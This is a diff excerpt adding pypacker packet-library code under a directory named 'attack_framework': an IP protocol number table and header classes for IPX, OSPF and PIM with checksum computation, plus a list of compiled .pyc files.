+IP_PROTO_IGMP		= 2			# IGMP
+IP_PROTO_GGP		= 3			# gateway-gateway protocol
+IP_PROTO_IPIP		= 4			# IP in IP
+IP_PROTO_ST		= 5			# ST datagram mode
+IP_PROTO_TCP		= 6			# TCP
+IP_PROTO_CBT		= 7			# CBT
+IP_PROTO_EGP		= 8			# exterior gateway protocol
+IP_PROTO_IGP		= 9			# interior gateway protocol
+IP_PROTO_BBNRCC		= 10			# BBN RCC monitoring
+IP_PROTO_NVP		= 11			# Network Voice Protocol
+IP_PROTO_PUP		= 12			# PARC universal packet
+IP_PROTO_ARGUS		= 13			# ARGUS
+IP_PROTO_EMCON		= 14			# EMCON
+IP_PROTO_XNET		= 15			# Cross Net Debugger
+IP_PROTO_CHAOS		= 16			# Chaos
+IP_PROTO_UDP		= 17			# UDP
+IP_PROTO_MUX		= 18			# multiplexing
+IP_PROTO_DCNMEAS	= 19			# DCN measurement
+IP_PROTO_HMP		= 20			# Host Monitoring Protocol
+IP_PROTO_PRM		= 21			# Packet Radio Measurement
+IP_PROTO_IDP		= 22			# Xerox NS IDP
+IP_PROTO_TRUNK1		= 23			# Trunk-1
+IP_PROTO_TRUNK2		= 24			# Trunk-2
+IP_PROTO_LEAF1		= 25			# Leaf-1
+IP_PROTO_LEAF2		= 26			# Leaf-2
+IP_PROTO_RDP		= 27			# "Reliable Datagram" proto
+IP_PROTO_IRTP		= 28			# Inet Reliable Transaction
+IP_PROTO_TP		= 29			# ISO TP class 4
+IP_PROTO_NETBLT		= 30			# Bulk Data Transfer
+IP_PROTO_MFPNSP		= 31			# MFE Network Services
+IP_PROTO_MERITINP	= 32			# Merit Internodal Protocol
+IP_PROTO_SEP		= 33			# Sequential Exchange proto
+IP_PROTO_3PC		= 34			# Third Party Connect proto
+IP_PROTO_IDPR		= 35			# Interdomain Policy Route
+IP_PROTO_XTP		= 36			# Xpress Transfer Protocol
+IP_PROTO_DDP		= 37			# Datagram Delivery Proto
+IP_PROTO_CMTP		= 38			# IDPR Ctrl Message Trans
+IP_PROTO_TPPP		= 39			# TP++ Transport Protocol
+IP_PROTO_IL		= 40			# IL Transport Protocol
+IP_PROTO_IP6		= 41			# IPv6
+IP_PROTO_SDRP		= 42			# Source Demand Routing
+IP_PROTO_ROUTING	= 43			# IPv6 routing header
+IP_PROTO_FRAGMENT	= 44			# IPv6 fragmentation header
+IP_PROTO_RSVP		= 46			# Reservation protocol
+IP_PROTO_GRE		= 47			# General Routing Encap
+IP_PROTO_MHRP		= 48			# Mobile Host Routing
+IP_PROTO_ENA		= 49			# ENA
+IP_PROTO_ESP		= 50			# Encap Security Payload
+IP_PROTO_AH		= 51			# Authentication Header
+IP_PROTO_INLSP		= 52			# Integated Net Layer Sec
+IP_PROTO_SWIPE		= 53			# SWIPE
+IP_PROTO_NARP		= 54			# NBMA Address Resolution
+IP_PROTO_MOBILE		= 55			# Mobile IP, RFC 2004
+IP_PROTO_TLSP		= 56			# Transport Layer Security
+IP_PROTO_SKIP		= 57			# SKIP
+IP_PROTO_ICMP6		= 58			# ICMP for IPv6
+IP_PROTO_NONE		= 59			# IPv6 no next header
+IP_PROTO_DSTOPTS	= 60			# IPv6 destination Woptions
+IP_PROTO_ANYHOST	= 61			# any host internal proto
+IP_PROTO_CFTP		= 62			# CFTP
+IP_PROTO_ANYNET		= 63			# any local network
+IP_PROTO_EXPAK		= 64			# SATNET and Backroom EXPAK
+IP_PROTO_KRYPTOLAN	= 65			# Kryptolan
+IP_PROTO_RVD		= 66			# MIT Remote Virtual Disk
+IP_PROTO_IPPC		= 67			# Inet Pluribus Packet Core
+IP_PROTO_DISTFS		= 68			# any distributed fs
+IP_PROTO_SATMON		= 69			# SATNET Monitoring
+IP_PROTO_VISA		= 70			# VISA Protocol
+IP_PROTO_IPCV		= 71			# Inet Packet Core Utility
+IP_PROTO_CPNX		= 72			# Comp Proto Net Executive
+IP_PROTO_CPHB		= 73			# Comp Protocol Heart Beat
+IP_PROTO_WSN		= 74			# Wang Span Network
+IP_PROTO_PVP		= 75			# Packet Video Protocol
+IP_PROTO_BRSATMON	= 76			# Backroom SATNET Monitor
+IP_PROTO_SUNND		= 77			# SUN ND Protocol
+IP_PROTO_WBMON		= 78			# WIDEBAND Monitoring
+IP_PROTO_WBEXPAK	= 79			# WIDEBAND EXPAK
+IP_PROTO_EON		= 80			# ISO CNLP
+IP_PROTO_VMTP		= 81			# Versatile Msg Transport
+IP_PROTO_SVMTP		= 82			# Secure VMTP
+IP_PROTO_VINES		= 83			# VINES
+IP_PROTO_TTP		= 84			# TTP
+IP_PROTO_NSFIGP		= 85			# NSFNET-IGP
+IP_PROTO_DGP		= 86			# Dissimilar Gateway Proto
+IP_PROTO_TCF		= 87			# TCF
+IP_PROTO_EIGRP		= 88			# EIGRP
+IP_PROTO_OSPF		= 89			# Open Shortest Path First
+IP_PROTO_SPRITERPC	= 90			# Sprite RPC Protocol
+IP_PROTO_LARP		= 91			# Locus Address Resolution
+IP_PROTO_MTP		= 92			# Multicast Transport Proto
+IP_PROTO_AX25		= 93			# AX.25 Frames
+IP_PROTO_IPIPENCAP	= 94			# yet-another IP encap
+IP_PROTO_MICP		= 95			# Mobile Internet Ctrl
+IP_PROTO_SCCSP		= 96			# Semaphore Comm Sec Proto
+IP_PROTO_ETHERIP	= 97			# Ethernet in IPv4
+IP_PROTO_ENCAP		= 98			# encapsulation header
+IP_PROTO_ANYENC		= 99			# private encryption scheme
+IP_PROTO_GMTP		= 100			# GMTP
+IP_PROTO_IFMP		= 101			# Ipsilon Flow Mgmt Proto
+IP_PROTO_PNNI		= 102			# PNNI over IP
+IP_PROTO_PIM		= 103			# Protocol Indep Multicast
+IP_PROTO_ARIS		= 104			# ARIS
+IP_PROTO_SCPS		= 105			# SCPS
+IP_PROTO_QNX		= 106			# QNX
+IP_PROTO_AN		= 107			# Active Networks
+IP_PROTO_IPCOMP		= 108			# IP Payload Compression
+IP_PROTO_SNP		= 109			# Sitara Networks Protocol
+IP_PROTO_COMPAQPEER	= 110			# Compaq Peer Protocol
+IP_PROTO_IPXIP		= 111			# IPX in IP
+IP_PROTO_VRRP		= 112			# Virtual Router Redundancy
+IP_PROTO_PGM		= 113			# PGM Reliable Transport
+IP_PROTO_ANY0HOP	= 114			# 0-hop protocol
+IP_PROTO_L2TP		= 115			# Layer 2 Tunneling Proto
+IP_PROTO_DDX		= 116			# D-II Data Exchange (DDX)
+IP_PROTO_IATP		= 117			# Interactive Agent Xfer
+IP_PROTO_STP		= 118			# Schedule Transfer Proto
+IP_PROTO_SRP		= 119			# SpectraLink Radio Proto
+IP_PROTO_UTI		= 120			# UTI
+IP_PROTO_SMP		= 121			# Simple Message Protocol
+IP_PROTO_SM		= 122			# SM
+IP_PROTO_PTP		= 123			# Performance Transparency
+IP_PROTO_ISIS		= 124			# ISIS over IPv4
+IP_PROTO_FIRE		= 125			# FIRE
+IP_PROTO_CRTP		= 126			# Combat Radio Transport
+IP_PROTO_CRUDP		= 127			# Combat Radio UDP
+IP_PROTO_SSCOPMCE	= 128			# SSCOPMCE
+IP_PROTO_IPLT		= 129			# IPLT
+IP_PROTO_SPS		= 130			# Secure Packet Shield
+IP_PROTO_PIPE		= 131			# Private IP Encap in IP
+IP_PROTO_SCTP		= 132			# Stream Ctrl Transmission
+IP_PROTO_FC		= 133			# Fibre Channel
+IP_PROTO_RSVPIGN	= 134			# RSVP-E2E-IGNORE
+IP_PROTO_RAW		= 255			# Raw IP packets
+IP_PROTO_RESERVED	= IP_PROTO_RAW		# Reserved
+IP_PROTO_MAX		= 255

+ 16 - 0
attack_framework/pypacker/layer3/ipx.py

@@ -0,0 +1,16 @@
+"""Internetwork Packet Exchange."""
+
+from pypacker import pypacker
+
+IPX_HDR_LEN = 30
+
+
+class IPX(pypacker.Packet):
+	__hdr__ = (
+		("sum", "H", 0xffff),
+		("len", "H", IPX_HDR_LEN),
+		("tc", "B", 0),
+		("pt", "B", 0),
+		("dst", "12s", b""),
+		("src", "12s", b"")
+	)

+ 26 - 0
attack_framework/pypacker/layer3/ospf.py

@@ -0,0 +1,26 @@
+"""Open Shortest Path First."""
+
+from pypacker import pypacker, checksum
+
+AUTH_NONE = 0
+AUTH_PASSWORD = 1
+AUTH_CRYPTO = 2
+
+
+class OSPF(pypacker.Packet):
+	__hdr__ = (
+		("v", "B", 0),
+		("type", "B", 0),
+		("len", "H", 0),
+		("router", "I", 0),
+		("area", "I", 0),
+		("sum", "H", 0),		# _sum = sum
+		("atype", "H", 0),
+		("auth", "8s", b"")
+	)
+
+	def bin(self, update_auto_fields=True):
+		if update_auto_fields and self._changed():
+			self.sum = 0
+			self.sum = checksum.in_cksum(pypacker.Packet.bin(self))
+		return pypacker.Packet.bin(self, update_auto_fields=update_auto_fields)

+ 31 - 0
attack_framework/pypacker/layer3/pim.py

@@ -0,0 +1,31 @@
+"""Protocol Independent Multicast."""
+
+from pypacker import pypacker, checksum
+
+
+class PIM(pypacker.Packet):
+	__hdr__ = (
+		("v_type", "B", 0x20),
+		("rsvd", "B", 0),
+		("sum", "H", 0)		# _sum = sum
+	)
+
+	def __get_v(self):
+		return self.v_type >> 4
+
+	def __set_v(self, v):
+		self.v_type = (v << 4) | (self.v_type & 0xf)
+	v = property(__get_v, __set_v)
+
+	def __get_type(self):
+		return self.v_type & 0xf
+
+	def __set_type(self, pimtype):
+		self.v_type = (self.v_type & 0xf0) | pimtype
+	type = property(__get_type, __set_type)
+
+	def bin(self, update_auto_fields=True):
+		if update_auto_fields and self._changed():
+			self.sum = 0
+			self.sum = checksum.in_cksum(pypacker.Packet.bin(self))
+		return pypacker.Packet.bin(self, update_auto_fields=update_auto_fields)

+ 0 - 0
attack_framework/pypacker/layer4/__init__.py


BIN
attack_framework/pypacker/layer4/__pycache__/__init__.cpython-33.pyc


BIN
attack_framework/pypacker/layer4/__pycache__/__init__.cpython-34.pyc


BIN
attack_framework/pypacker/layer4/__pycache__/sctp.cpython-33.pyc


BIN
attack_framework/pypacker/layer4/__pycache__/sctp.cpython-34.pyc


BIN
attack_framework/pypacker/layer4/__pycache__/ssl.cpython-33.pyc


BIN
attack_framework/pypacker/layer4/__pycache__/ssl.cpython-34.pyc


Some files were not shown because too many files changed in this diff